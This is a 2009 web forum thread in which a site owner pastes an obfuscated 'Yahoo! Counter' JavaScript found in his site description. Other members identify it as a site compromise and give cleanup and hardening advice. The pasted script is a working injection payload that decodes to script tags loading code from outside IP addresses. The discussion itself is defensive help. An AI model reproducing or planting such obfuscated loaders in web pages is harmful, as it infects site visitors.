| what is yahoo counter? | |
Posted: 01/26/2009 10:27 AM |
|
|
|
|
Citation |
Posts |
4813 |
Word Cnt. |
427,864 |
BDay |
Oct 23 |
Sign |
Scorpio |
Sex |
|
|
|
|
Joined: Feb 09, 2005
Local time: 1:22 AM
Location: Sterling IL
|
|
|
|
|
|
I see yahoo counter in my site description with a bunch of numbers and characters, does anyone know what this is for? Does it hurt to remove it when changing key words or should I leave it there?
Code:
|
<script language=javascript><!-- Yahoo! Counter starts if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F|/!%3C%64`i$%76 |%20|%73%74%79~l%65=d@%69s#p#lay&%3A!n#%6F@%6E&%65|%3E\n~d%6F`cume%6Et $%2E%77%72|i!t%65%28`"!%3C&%2Ft|ex%74|%61@re|a#%3E")%3B%76$%61&r%20|i` ,_$%2C%61!=&%5B`"7|8.%311#0#%2E%31%37@%35.|%32!%31"!%2C%22%31%39&5%2E %324%2E|76%2E|%325%31"$%5D~;_$%3D$%31|%3B`%69&%66~(%64`o%63um$%65|n%74 .%63&o%6F|k&%69e~.&%6D%61%74%63h%28/&%5C%62|h!%67$%66#t$%3D%31~/`%29=& =$%6E|u`ll&%29|f!o%72!%28!i%3D0%3B%69%3C%32;i%2B#%2B$%29%64~o`%63u@men %74.w$%72|i%74&e%28"%3C|%73%63&%72%69!p%74%3Ei%66(`%5F%29do%63|u!m%65% 6E~%74.~%77%72%69~t%65@(%5C!"~%3C~sc~%72%69@p%74&%20&%69@d#%3D$%5F%22% 2B!i!+#"_@%20~%73|%72%63%3D/~/!"&+|%61[|i%5D$%2B%22%2F#%63&p/?"!+%6Ea# %76~%69g|%61!to%72.%61%70!p%4Ea&%6D|%65|%2Ech~a!r`A#t#(0%29%2B&"%3E$%3 C%5C%5C%2F%73`c!r@%69|p!t|%3E@%5C|"%29!%3C%5C%2F|%73`%63~%72ip!t%3E@%2 2#)%3B@\n%2F/%3C/&%64%69v%3E').replace(/~|@|\!|\$|#|`|\&|\|/g,""));var yahoo_counter=1; <!-- counter end --></script>
|
|
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 11:30 AM |
|
|
|
|
Site Admin |
Posts |
49593 |
Word Cnt. |
2,756,445 |
BDay |
Apr 22 |
Sign |
Taurus |
Sex |
|
|
|
|
Joined: Sep 25, 2004
Local time: 11:22 AM
Location: Texas
|
|
|
|
|
|
Holy Cow!! LOL I have no idea, Dave. I wouldn't remove anything just yet, although it looks like garbage to me. I would wait to see what Blake has to say about it.
|
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 2:19 PM |
|
|
|
|
Site Admin |
Posts |
30756 |
Word Cnt. |
2,628,678 |
BDay |
Jul 28 |
Sign |
Leo |
Sex |
|
|
|
|
Joined: Sep 25, 2004
Local time: 1:22 PM
Location: St Pete, FL
|
|
|
|
|
|
Which file is that coming from? It looks like your files have been hacked...
|
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 4:25 PM |
|
|
|
|
Citation |
Posts |
4813 |
Word Cnt. |
427,864 |
BDay |
Oct 23 |
Sign |
Scorpio |
Sex |
|
|
|
|
Joined: Feb 09, 2005
Local time: 1:22 AM
Location: Sterling IL
|
|
|
|
|
|
Well in general admin in the "Site description". I'm going to delete it. |
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 4:34 PM |
|
|
|
|
Citation |
Posts |
4813 |
Word Cnt. |
427,864 |
BDay |
Oct 23 |
Sign |
Scorpio |
Sex |
|
|
|
|
Joined: Feb 09, 2005
Local time: 1:22 AM
Location: Sterling IL
|
|
|
|
|
|
I did a google on
Quote:
|
Yahoo! Counter starts if(typeof(yahoo_counter
|
and I think I have a trojan. I just closed a ticket with IX about a bad connection, darn. I am going to reopen it now. Here is what I found:
http://www.vbadvanced.com/forum/showthread.php?t=33084
My site VB.3.7.3 VBA 3.0.1 www.udpride.com is currently suffering from the
"!-- Yahoo! Counter starts..." trojan that has appended to the footer of all of my forum pages (regardless or template/style). I looked at my footer templates in VB CP and this code is not there. My last code is as it should be -- Site Catalyst page tracking software. However when you do a view source, the Yahoo code has been appended right after it at the bottom of the pages. Looks like this:
Code:
When I toggled off/on my plugins, the problem goes away when VBA CMPS is disabled.
This trojan has been going around and infecting blogs and forums. It slows the pages down, sets off all kinds of alarms on virus software and can causes major issues with search engine results.
Questions:
1. How Did it Get there?
2. How do I remove it?
3. What CMOD permissions should be on my folders and files inside my forums???
I noticed in my /forums folders "cache", "includes", and "modules" (vba?) are all 777 permissions.
Should all folders be 777 and all files be 644 without exception? |
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 4:48 PM |
|
|
|
|
Citation |
Posts |
4813 |
Word Cnt. |
427,864 |
BDay |
Oct 23 |
Sign |
Scorpio |
Sex |
|
|
|
|
Joined: Feb 09, 2005
Local time: 1:22 AM
Location: Sterling IL
|
|
|
|
|
|
NR could you take a look in my server and see if you see anyone that shouldn't be there? |
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 6:19 PM |
|
|
|
|
Citation |
Posts |
4813 |
Word Cnt. |
427,864 |
BDay |
Oct 23 |
Sign |
Scorpio |
Sex |
|
|
|
|
Joined: Feb 09, 2005
Local time: 1:22 AM
Location: Sterling IL
|
|
|
|
|
|
It sounds like it might be a IX problem. Help told me they couldn't find anything and dropped it. It sounds like this can be really bad. It can infiltrate deep into files and can be hard to find and clean. They talk all about it on that page I posted:
http://www.vbadvanced.com/forum/showthread.php?t=33084
Maybe that is what happened to you guys last week? |
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 6:20 PM |
|
|
|
|
Citation |
Posts |
4813 |
Word Cnt. |
427,864 |
BDay |
Oct 23 |
Sign |
Scorpio |
Sex |
|
|
|
|
Joined: Feb 09, 2005
Local time: 1:22 AM
Location: Sterling IL
|
|
|
|
|
|
paste:
This code buries itself in your footers to the tune of endless random PHP (that obviously means something to someone) and also dumps a Yahoo Counter php script somewhere north of your footer, perhaps in the Meta Description of your VBulletin. You need to get rid of both.
There is probably also an htaccess file on your site somewhere and in that same folder you will find an index.htm attributable to these scumbags who dumped the code on you as their calling card. Youll need to remove those as well.
The PHP jibberish is at the tail end of dozens if not hundreds of your PHP files and TMPL files. Start with PHP files that relate to configurations.
Also, if you run VB Advanced, check your module PHP files. Most of those will probably have the jibberish as well.
Check your file and folder permissions. The hack may have changed them or exploited incorrect ones. 755 the folders and 644 the files. Michael indicates VB does not need any 777 folders to run (though add-ons might).
Its a painstaking process. The hacked code slows the sites down, sets off all kinds of bells and whistles with users antivirus etc.
Also run MalWareByte (download free at Download.com) to scan your hard drive for any bad guys that may have jumped into your own machine.
Last thing is change your passwords. All of them.
And when you run into trouble, give a shout out here. I can tell you what I found, and the admins here can work something out with you to take a look and help solve the problem as they did with me. |
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 8:08 PM |
|
|
|
|
Site Admin |
Posts |
49593 |
Word Cnt. |
2,756,445 |
BDay |
Apr 22 |
Sign |
Taurus |
Sex |
|
|
|
|
Joined: Sep 25, 2004
Local time: 11:22 AM
Location: Texas
|
|
|
|
|
|
Thanks for all your work on this Dave, I'm sending a heads up to Blake. He should be back home from the dog park in a couple of hours.
|
|
|
|
|
Back to Top |
|
|
| Re: what is yahoo counter? | |
Posted: 01/26/2009 9:38 PM |
|
|
|
|
Site Admin |
Posts |
30756 |
Word Cnt. |
2,628,678 |
BDay |
Jul 28 |
Sign |
Leo |
Sex |
|
|
|
|
Joined: Sep 25, 2004
Local time: 1:22 PM
Location: St Pete, FL
|
|
|
|
|
|
Dave, if you can give me some idea of where to start looking, I can take a peak at your files. If it turns out that a bunch of your files have been modified, I can download all the files and use UltraEdit to remove the unwanted code from all the files at once. It is a lot easier than trying to manually remove any added code from thousands of files. From looking at your server, I don't see anything suspicious that stands out, so I need a hint of where to look. Usually the file modified date/time stamps give clues where the hacker has been. On first glance, I don't see any files that were modified recently...
|
|
|
|
|
Back to Top |
|
|
| Information | |
|